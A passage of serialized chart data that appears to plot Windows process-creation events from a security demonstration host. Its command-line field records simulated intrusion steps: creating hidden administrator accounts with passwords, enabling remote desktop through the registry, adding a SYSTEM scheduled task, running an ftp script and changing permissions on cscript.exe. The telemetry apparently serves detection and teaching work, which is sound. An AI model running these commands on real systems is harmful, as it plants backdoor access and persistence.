height\":{\"units\":\"data\",\"value\":0.8},\"line_alpha\":{\"value\":0.1},\"line_color\":{\"value\":\"#1f77b4\"},\"width\":{\"units\":\"data\",\"value\":1.2},\"x\":{\"field\":\"Level\",\"transform\":{\"id\":\"4178\"}},\"y\":{\"field\":\"Row\"}},\"id\":\"4181\",\"type\":\"Rect\"},{\"attributes\":{\"data\":{\"Account\":[\"NaN\",\"WORKGROUP\\\\BlackHatDemoHos$\",\"BlackHatDemoHos\\\\timvic\",\"BlackHatDemoHos\\\\timvic\",\"BlackHatDemoHos\\\\timvic\",\"BlackHatDemoHos\\\\timvic\",\"BlackHatDemoHos\\\\timvic\",\"BlackHatDemoHos\\\\timvic\",\"BlackHatDemoHos\\\\timvic\",\"BlackHatDemoHos\\\\timvic\",\"BlackHatDemoHos\\\\timvic\",\"BlackHatDemoHos\\\\timvic\",\"BlackHatDemoHos\\\\timvic\",\"BlackHatDemoHos\\\\timvic\",\"BlackHatDemoHos\\\\timvic\",\"BlackHatDemoHos\\\\timvic\",\"BlackHatDemoHos\\\\timvic\",\"BlackHatDemoHos\\\\timvic\",\"BlackHatDemoHos\\\\timvic\",\"BlackHatDemoHos\\\\timvic\",\"BlackHatDemoHos\\\\timvic\",\"BlackHatDemoHos\\\\timvic\",\"BlackHatDemoHos\\\\timvic\",\"BlackHatDemoHos\\\\timvic\",\"BlackHatDemoHos\\\\timvic\",\"BlackHatDemoHos\\\\timvic\",\"BlackHatDemoHos\\\\timvic\",\"BlackHatDemoHos\\\\timvic\",\"BlackHatDemoHos\\\\timvic\",\"BlackHatDemoHos\\\\timvic\",\"BlackHatDemoHos\\\\timvic\",\"BlackHatDemoHos\\\\timvic\",\"BlackHatDemoHos\\\\timvic\",\"BlackHatDemoHos\\\\timvic\",\"BlackHatDemoHos\\\\timvic\",\"BlackHatDemoHos\\\\timvic\",\"BlackHatDemoHos\\\\timvic\",\"BlackHatDemoHos\\\\timvic\",\"BlackHatDemoHos\\\\timvic\",\"BlackHatDemoHos\\\\timvic\",\"BlackHatDemoHos\\\\timvic\",\"BlackHatDemoHos\\\\timvic\",\"BlackHatDemoHos\\\\timvic\",\"BlackHatDemoHos\\\\timvic\",\"BlackHatDemoHos\\\\timvic\",\"BlackHatDemoHos\\\\timvic\",\"BlackHatDemoHos\\\\timvic\",\"BlackHatDemoHos\\\\timvic\",\"BlackHatDemoHos\\\\timvic\",\"BlackHatDemoHos\\\\timvic\",\"BlackHatDemoHos\\\\timvic\",\"BlackHatDemoHos\\\\timvic\",\"WORKGROUP\\\\BlackHatDemoHos$\"],\"CommandLine\":[\"NaN\",\"C:\\\\windows\\\\system32\\\\userinit.exe\",\"C:\\\\windows\\\\Explorer.EXE\",\"\\\"C:\\\\Windows\\\\System32\\\\SecurityHealthSystray.exe\\\" \",\"\\\"C:\\\\Users\\\\timvic\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\OneDrive.exe\\\" /background\",\"\\\"C:\\\\Windows\\\\System32\\\\cmd.exe\\\" /q /c del /q \\\"C:\\\\Users\\\\timvic\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\Update\\\\OneDriveSetup.exe\\\"\",\"\\\\??\\\\C:\\\\windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Windows\\\\System32\\\\cmd.exe\\\" /q /c del /q \\\"C:\\\\Users\\\\timvic\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\StandaloneUpdater\\\\OneDriveSetup.exe\\\"\",\"\\\\??\\\\C:\\\\windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Windows\\\\System32\\\\cmd.exe\\\" /q /c rmdir /s /q \\\"C:\\\\Users\\\\timvic\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\18.143.0717.0002\\\\amd64\\\"\",\"\\\\??\\\\C:\\\\windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Windows\\\\System32\\\\cmd.exe\\\" /q /c rmdir /s /q \\\"C:\\\\Users\\\\timvic\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\18.143.0717.0002\\\"\",\"\\\\??\\\\C:\\\\windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\windows\\\\system32\\\\cmd.exe\\\" \",\"net  user abai$ Wf9k44_9d[=$ /add\",\"C:\\\\windows\\\\system32\\\\net1  user abai$ Wf9k44_9d[=$ /add\",\"net  user abai$ Wf9k44_9d[=$\",\"C:\\\\windows\\\\system32\\\\net1  user abai$ Wf9k44_9d[=$\",\"net  localgroup administrators \",\"C:\\\\windows\\\\system32\\\\net1  localgroup administrators \",\"findstr  \\\"abai$\\\"\",\"net  localgroup administrators abai$ /add\",\"C:\\\\windows\\\\system32\\\\net1  localgroup administrators abai$ /add\",\"net  users \",\"C:\\\\windows\\\\system32\\\\net1  users \",\"findstr  \\\"secure-ssl-sec.com\\\"\",\"net  user faxing-mon.best Wf9k44_9d[=$ /add\",\"C:\\\\windows\\\\system32\\\\net1  user faxing-mon.best Wf9k44_9d[=$ /add\",\"net  user secure-ssl-sec.com Wf9k44_sinc9d3[=$\",\"C:\\\\windows\\\\system32\\\\net1  user secure-ssl-sec.com Wf9k44_sinc9d3[=$\",\"net  user secure-ssl-sec.com /active:yes\",\"C:\\\\windows\\\\system32\\\\net1  user secure-ssl-sec.com /active:yes\",\"cmd  /c echo QWxsIHlvdXIgc2VydmVycyBiZWxvbmcgdG8gZmF4aW5nLW1vbi5iZXN0IG5vdy4= \",\"reg  ADD \\\"HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\Terminal Server\\\" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f\\\"\",\"schtasks.exe  /create /tn  /tr \\\"c:\\\\pagefile.exe /?\\\" /sc hour /mo 1 /ru \\\"system\\\" /f\",\"ping  32.220.60.108 -n 100 \",\"net  localgroup administrators abai$ /delete\",\"C:\\\\windows\\\\system32\\\\net1  localgroup administrators abai$ /delete\",\"net  user abai$ /delete\",\"C:\\\\windows\\\\system32\\\\net1  user abai$ /delete\",\"net  user faxing-mon.best /delete\",\"C:\\\\windows\\\\system32\\\\net1  user faxing-mon.best /delete\",\"cmd  /c echo End Security Demo tasks\",\"\\\\??\\\\C:\\\\windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"cmd  /c echo Begin Security Demo tasks\",\"cmd  /c echo Any questions about the commands executed here then please contact one of\",\"cmd  /c echo timb@microsoft.com; ianhelle@microsoft.com; shainw@microsoft.com\",\"ftp  -s:MG06.dll\",\"cacls.exe  C:\\\\Windows\\\\system32\\\\cscript.exe /e /t /g SYSTEM:F\",\"net  users \",\"C:\\\\windows\\\\system32\\\\net1  users \",\"findstr  \\\"abai$\\\"\",\"\\\"LogonUI.exe\\\" /flags:0x0 /state0:0xa3c7e055 /state1:0x41c64e6d\"],\"Computer\":[\"BlackHatDemoHos\",\"BlackHatDemoHos\",\"BlackHatDemoHos\",\"BlackHatDemoHos\",\"BlackHatDemoHos\",\"BlackHatDemoHos\",\"BlackHatDemoHos\",\"BlackHatDemoHos\",\"BlackHatDemoHos\",\"BlackHatDemoHos\",\"BlackHatDemoHos\",\"BlackHatDemoHos\",\"BlackHatDemoHos\",\"BlackHatDemoHos\",\"BlackHatDemoHos\",\"BlackHatDemoHos\",\"BlackHatDemoHos\",\"BlackHatDemoHos\",\"BlackHatDemoHos\",\"BlackHatDemoHos\",\"BlackHatDemoHos\",\"BlackHatDemoHos\",\"BlackHatDemoHos\",\"BlackHatDemoHos\",\"BlackHatDemoHos\",\"BlackHatDemoHos\",\"BlackHatDemoHos\",\"BlackHatDemoHos\",\"BlackHatDemoHos\",\"BlackHatDemoHos\",\"BlackHatDemoHos\",\"BlackHatDemoHos\",\"BlackHatDemoHos\",\"BlackHatDemoHos\",\"BlackHatDemoHos\",\"BlackHatDemoHos\",\"BlackHatDemoHos\",\"BlackHatDemoHos\",\"BlackHatDemoHos\",\"BlackHatDemoHos\",\"BlackHatDemoHos\",\"BlackHatDemoHos\",\"BlackHatDemoHos\",\"BlackHatDemoHos\",\"BlackHatDemoHos\",\"BlackHatDemoHos\",\"BlackHatDemoHos\",\"BlackHatDemoHos\",\"BlackHatDemoHos\",\"BlackHatDemoHos\",\"BlackHatDemoHos\",\"BlackHatDemoHos\",\"BlackHatDemoHos\"],\"EffectiveLogonId\":[\"0x3e7\",\"0x136fc6\",\"0x136fc6\",\"0x136fc6\",\"0x136fc6\",\"0x136fc6\",\"0x136fc6\",\"0x136fc6\",\"0x136fc6\",\"0x136fc6\",\"0x136fc6\",\"0x136fc6\",\"0x136fc6\",\"0x136fc6\",\"0x136fc6\",\"0x136fc6\",\"0x136fc6\",\"0x136fc6\",\"0x136fc6\",\"0x136fc6\",\"0x136fc6\",\"0x136fc6\",\"0x136fc6\",\"0x136fc6\",\"0x136fc6\",\"0x136fc6\",\"0x136fc6\",\"0x136fc6\",\"0x136fc6\",\"0x136fc6\",\"0x136fc6\",\"0x136fc6\",\"0x136fc6\",\"0x136fc6\",\"0x136fc6\",\"0x136fc6\",\"0x136fc6\",\"0x136fc6\",\"0x136fc6\",\"0x136fc6\",\"0x136fc6\",\"0x136fc6\",\"0x136fc6\",\"0x136fc6\",\"0x136fc6\",\"0x136fc6\",\"0x136fc6\",\"0x136fc6\",\"0x136fc6\",\"0x136fc6\",\"0x136fc6\",\"0x136fc6\",\"0x3e7\"],\"EffectiveLogonId_par\":[\"NaN\",\"0x3e7\",\"0x136fc6\",\"0x136fc6\",\"0x136fc6\",\"0x136fc6\",\"0x136fc6\",\"0x136fc6\",\"0x136fc6\",\"0x136fc6\",\"0x136fc6\",\"0x136fc6\",\"0x136fc6\",\"0x136fc6\",\"0x136fc6\",\"0x136fc6\",\"0x136fc6\",\"0x136fc6\",\"0x136fc6\",\"0x136fc6\",\"0x136fc6\",\"0x136fc6\",\"0x136fc6\",\"0x136fc6\",\"0x136fc6\",\"0x136fc6\",\"0x136fc6\",\"0x136fc6\",\"0x136fc6\",\"0x136fc6\",\"0x136fc6\",\"0x136fc6\",\"0x136fc6\",\"0x136fc6\",\"0x136fc6\",\"0x136fc6\",\"0x136fc6\",\"0x136fc6\",\"0x136fc6\",\"0x136fc6\",\"0x136fc6\",\"0x136fc6\",\"0x136fc6\",\"0x136fc6\",\"0x136fc6\",\"0x136fc6\",\"0x136fc6\",\"0x136fc6\",\"0x136fc6\",\"0x136fc6\",\"0x136fc6\",\"0x136fc6\",\"0x3e7\"],\"EventID\":[4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688],\"Exe\":[\"winlogon.exe\",\"userinit.exe\",\"explorer.exe\",\"SecurityHealthSystray.exe\",\"OneDrive.exe\",\"cmd.exe\",\"conhost.exe\",\"cmd.exe\",\"conhost.exe\",\"cmd.exe\",\"conhost.exe\",\"cmd.exe\",\"conhost.exe\",\"cmd.exe\",\"net.exe\",\"net1.exe\",\"net.exe\",\"net1.exe\",\"net.exe\",\"net1.exe\",\"findstr.exe\",\"net.exe\",\"net1.exe\",\"net.exe\",\"net1.exe\",\"findstr.exe\",\"net.exe\",\"net1.exe\",\"net.exe\",\"net1.exe\",\"net.exe\",\"net1.exe\",\"cmd.exe\",\"reg.exe\",\"schtasks.exe\",\"PING.EXE\",\"net.exe\",\"net1.exe\",\"net.exe\",\"net1.exe\",\"net.exe\",\"net1.exe\",\"cmd.exe\",\"conhost.exe\",\"cmd.exe\",\"cmd.exe\",\"cmd.exe\",\"ftp.exe\",\"cacls.exe\",\"net.exe\",\"net1.exe\",\"findstr.exe\",\"LogonUI.exe\"],\"IsBranch\":[false,true,true,false,false,true,false,true,false,true,false,true,false,true,true,false,true,false,true,false,false,true,false,true,false,false,true,false,true,false,true,false,false,false,false,false,true,false,true,false,true,false,false,false,false,false,false,false,false,true,false,false,false],\"IsLeaf\":[false,false,false,true,true,false,true,false,true,false,true,false,true,false,false,true,false,true,false,true,true,false,true,false,true,true,false,true,false,true,false,true,true,true,true,true,false,true,false,true,false,true,true,true,true,true,true,true,true,false,true,true,true],\"IsRoot\":[true,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false],\"Level\":[1,2,3,4,4,4,5,4,5,4,5,4,5,4,5,6,5,6,5,6,5,5,6,5,6,5,5,6,5,6,5,6,5,5,5,5,5,6,5,6,5,6,5,5,5,5,5,5,5,5,6,5,2],\"NewProcessId\":[\"0x60c\",\"0x1968\",\"0x19a0\",\"0x9fc\",\"0x1240\",\"0x2414\",\"0x2424\",\"0x241c\",\"0x242c\",\"0x2440\",\"0x244c\",\"0x246c\",\"0x2480\",\"0x21ec\",\"0x2418\",\"0x24d0\",\"0x2490\",\"0x24a0\",\"0x2118\",\"0x26d0\",\"0x2420\",\"0x2684\",\"0x20ac\",\"0x227c\",\"0x2160\",\"0xab0\",\"0x1d94\",\"0x2140\",\"0x146c\",\"0x23ac\",\"0x230c\",\"0x438\",\"0x1a38\",\"0x2268\",\"0x2524\",\"0x2048\",\"0x22c0\",\"0x1dc8\",\"0x93c\",\"0x1814\",\"0x2488\",\"0x1fb8\",\"0x1214\",\"0x1e44\",\"0x2154\",\"0x2690\",\"0x26e4\",\"0x279c\",\"0x21d8\",\"0x27bc\",\"0x2410\",\"0x2720\",\"0x15d0\"],\"NewProcessId_par\":[\"NaN\",\"0x60c\",\"0x1968\",\"0x19a0\",\"0x19a0\",\"0x19a0\",\"0x2414\",\"0x19a0\",\"0x241c\",\"0x19a0\",\"0x2440\",\"0x19a0\",\"0x246c\",\"0x19a0\",\"0x21ec\",\"0x2418\",\"0x21ec\",\"0x2490\",\"0x21ec\",\"0x2118\",\"0x21ec\",\"0x21ec\",\"0x2684\",\"0x21ec\",\"0x227c\",\"0x21ec\",\"0x21ec\",\"0x1d94\",\"0x21ec\",\"0x146c\",\"0x21ec\",\"0x230c\",\"0x21ec\",\"0x21ec\",\"0x21ec\",\"0x21ec\",\"0x21ec\",\"0x22c0\",\"0x21ec\",\"0x93c\",\"0x21ec\",\"0x2488\",\"0x21ec\",\"0x21ec\",\"0x21ec\",\"0x21ec\",\"0x21ec\",\"0x21ec\",\"0x21ec\",\"0x21ec\",\"0x27bc\",\"0x21ec\",\"0x60c\"],\"NewProcessName\":[\"C:\\\\Windows\\\\System32\\\\winlogon.exe\",\"C:\\\\Windows\\\\System32\\\\userinit.exe\",\"C:\\\\Windows\\\\explorer.exe\",\"C:\\\\Windows\\\\System32\\\\SecurityHealthSystray.exe\",\"C:\\\\Users\\\\timvic\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\OneDrive.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Windows\\\\System32\\\\findstr.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Windows\\\\System32\\\\findstr.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\W!ndows\\\\System32\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\schtasks.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\ftp.exe\",\"C:\\\\W!ndows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Windows\\\\System32\\\\findstr.exe\",\"C:\\\\Windows\\\\System32\\\\LogonUI.exe\"],\"NewProcessName_par\":[\"NaN\",\"NaN\",\"C:\\\\Windows\\\\System32\\\\userinit.exe\",\"C:\\\\Windows\\\\explorer.exe\",\"C:\\\\Windows\\\\explorer.exe\",\"C:\\\\Windows\\\\explorer.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\explorer.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\explorer.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\explorer.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\explorer.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"NaN\"],\"PID\":[\"PID: 0x60c (1548)\",\"PID: 0x1968 (6504)\",\"PID: 0x19a0 (6560)\",\"PID: 0x9fc (2556)\",\"PID: 0x1240 (4672)\",\"PID: 0x2414 (9236)\",\"PID: 0x2424 (9252)\",\"PID: 0x241c (9244)\",\"PID: 0x242c (9260)\",\"PID: 0x2440 (9280)\",\"PID: 0x244c (9292)\",\"PID: 0x246c (9324)\",\"PID: 0x2480 (9344)\",\"PID: 0x21ec (8684)\",\"PID: 0x2418 (9240)\",\"PID: 0x24d0 (9424)\",\"PID: 0x2490 (9360)\",\"PID: 0x24a0 (9376)\",\"PID: 0x2118 (8472)\",\"PID: 0x26d0 (9936)\",\"PID: 0x2420 (9248)\",\"PID: 0x2684 (9860)\",\"PID: 0x20ac (8364)\",\"PID: 0x227c (8828)\",\"PID: 0x2160 (8544)\",\"PID: 0xab0 (2736)\",\"PID: 0x1d94 (7572)\",\"PID: 0x2140 (8512)\",\"PID: 0x146c (5228)\",\"PID: 0x23ac (9132)\",\"PID: 0x230c (8972)\",\"PID: 0x438 (1080)\",\"PID: 0x1a38 (6712)\",\"PID: 0x2268 (8808)\",\"PID: 0x2524 (9508)\",\"PID: 0x2048 (8264)\",\"PID: 0x22c0 (8896)\",\"PID: 0x1dc8 (7624)\",\"PID: 0x93c (2364)\",\"PID: 0x1814 (6164)\",\"PID: 0x2488 (9352)\",\"PID: 0x1fb8 (8120)\",\"PID: 0x1214 (4628)\",\"PID: 0x1e44 (7748)\",\"PID: 0x2154 (8532)\",\"PID: 0x2690 (9872)\",\"PID: 0x26e4 (9956)\",\"PID: 0x279c (10140)\",\"PID: 0x21d8 (8664)\",\"PID: 0x27bc (10172)\",\"PID: 0x2410 (9232)\",\"PID: 0x2720 (10016)\",\"PID: 0x15d0 (5584)\"],\"ParentProcessName\":[\"NaN\",\"C:\\\\Windows\\\\System32\\\\winlogon.exe\",\"C:\\\\Windows\\\\System32\\\\userinit.exe\",\"C:\\\\Windows\\\\explorer.exe\",\"C:\\\\Windows\\\\explorer.exe\",\"C:\\\\Windows\\\\explorer.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\explorer.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\explorer.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\explorer.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\explorer.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\winlogon.exe\"],\"ProcessId\":[\"NaN\",\"0x60c\",\"0x1968\",\"0x19a0\",\"0x19a0\",\"0x19a0\",\"0x2414\",\"0x19a0\",\"0x241c\",\"0x19a0\",\"0x2440\",\"0x19a0\",\"0x246c\",\"0x19a0\",\"0x21ec\",\"0x2418\",\"0x21ec\",\"0x2490\",\"0x21ec\",\"0x2118\",\"0x21ec\",\"0x21ec\",\"0x2684\",\"0x21ec\",\"0x227c\",\"0x21ec\",\"0x21ec\",\"0x1d94\",\"0x21ec\",\"0x146c\",\"0x21ec\",\"0x230c\",\"0x21ec\",\"0x21ec\",\"0x21ec\",\"0x21ec\",\"0x21ec\",\"0x22c0\",\"0x21ec\",\"0x93c\",\"0x21ec\",\"0x2488\",\"0x21ec\",\"0x21ec\",\"0x21ec\",\"0x21ec\",\"0x21ec\",\"0x21ec\",\"0x21ec\",\"0x21ec\",\"0x27bc\",\"0x21ec\",\"0x60c\"],\"ProcessId_par\":[\"NaN\",\"NaN\",\"0x60c\",\"0x1968\",\"0x1968\",\"0x1968\",\"0x19a0\",\"0x1968\",\"0x19a0\",\"0x1968\",\"0x19a0\",\"0x1968\",\"0x19a0\",\"0x1968\",\"0x19a0\",\"0x21ec\",\"0x19a0\",\"0x21ec\",\"0x19a0\",\"0x21ec\",\"0x19a0\",\"0x19a0\",\"0x21ec\",\"0x19a0\",\"0x21ec\",\"0x19a0\",\"0x19a0\",\"0x21ec\",\"0x19a0\",\"0x21ec\",\"0x19a0\",\"0x21ec\",\"0x19a0\",\"0x19a0\",\"0x19a0\",\"0x19a0\",\"0x19a0\",\"0x21ec\",\"0x19a0\",\"0x21ec\",\"0x19a0\",\"0x21ec\",\"0x19a0\",\"0x19a0\",\"0x19a0\",\"0x19a0\",\"0x19a0\",\"0x19a0\",\"0x19a0\",\"0x19a0\",\"0x21ec\",\"0x19a0\",\"NaN\"],\"Row\":[53,52,51,50,49,48,47,46,45,44,43,42,41,40,39,38,37,36,35,34,33,32,31,30,29,28,27,26,25,24,23,22,21,20,19,18,17,16,15,14,13,12,11,10,9,8,7,6,5,4,3,2,1],\"SourceComputerId\":[\"NaN\",\"73a015ec-e2b6-4bf7-b353-ebeafb54254e\",\"73a015ec-e2b6-4bf7-b353-ebeafb54254e\",\"73a015ec-e2b6-4bf7-b353-ebeafb54254e\",\"73a015ec-e2b6-4bf7-b353-ebeafb54254e\",\"73a015ec-e2b6-4bf7-b353-ebeafb54254e\",\"73a015ec-e2b6-4bf7-b353-ebeafb54254e\",\"73a015ec-e2b6-4bf7-b353-ebeafb54254e\",\"73a015ec-e2b6-4bf7-b353-ebeafb54254e\",\"73a015ec-e2b6-4bf7-b353-ebeafb54254e\",\"73a015ec-e2b6-4bf7-b353-ebeafb54254e\",\"73a015ec-e2b6-4bf7-b353-ebeafb54254e\",\"73a015ec-e2b6-4bf7-b353-ebeafb54254e\",\"73a015ec-e2b6-4bf7-b353-ebeafb54254e\",\"73a015ec-e2b6-4bf7-b353-ebeafb54254e\",\"73a015ec-e2b6-4bf7-b353-ebeafb54254e\",\"73a015ec-e2b6-4bf7-b353-ebeafb54254e\",\"73a015ec-e2b6-4bf7-b353-ebeafb54254e\",\"73a015ec-e2b6-4bf7-b353-ebeafb54254e\",\"73a015ec-e2b6-4bf7-b353-ebeafb54254e\",\"73a015ec-e2b6-4bf7-b353-ebeafb54254e\",\"73a015ec-e2b6-4bf7-b353-ebeafb54254e\",\"73a015ec-e2b6-4bf7-b353-ebeafb54254e\",\"73a015ec-e2b6-4bf7-b353-ebeafb54254e\",\"73a015ec-e2b6-4bf7-b353-ebeafb54254e\",\"73a015ec-e2b6-4bf7-b353-ebeafb54254e\",\"73a015ec-e2b6-4bf7-b353-ebeafb54254e\",\"73a015ec-e2b6-4bf7-b353-ebeafb54254e\",\"73a015ec-e2b6-4bf7-b353-ebeafb54254e\",\"73a015ec-e2b6-4bf7-b353-ebeafb54254e\",\"73a015ec-e2b6-4bf7-b353-ebeafb54254e\",\"73a015ec-e2b6-4bf7-b353-ebeafb54254e\",\"73a015ec-e2b6-4bf7-b353-ebeafb54254e\",\"73a015ec-e2b6-4bf7-b353-ebeafb54254e\",\"73a015ec-e2b6-4bf7-b353-ebeafb54254e\",\"73a015ec-e2b6-4bf7-b353-ebeafb54254e\",\"73a015ec-e2b6-4bf7-b353-ebeafb54254e\",\"73a015ec-e2b6-4bf7-b353-ebeafb54254e\",\"7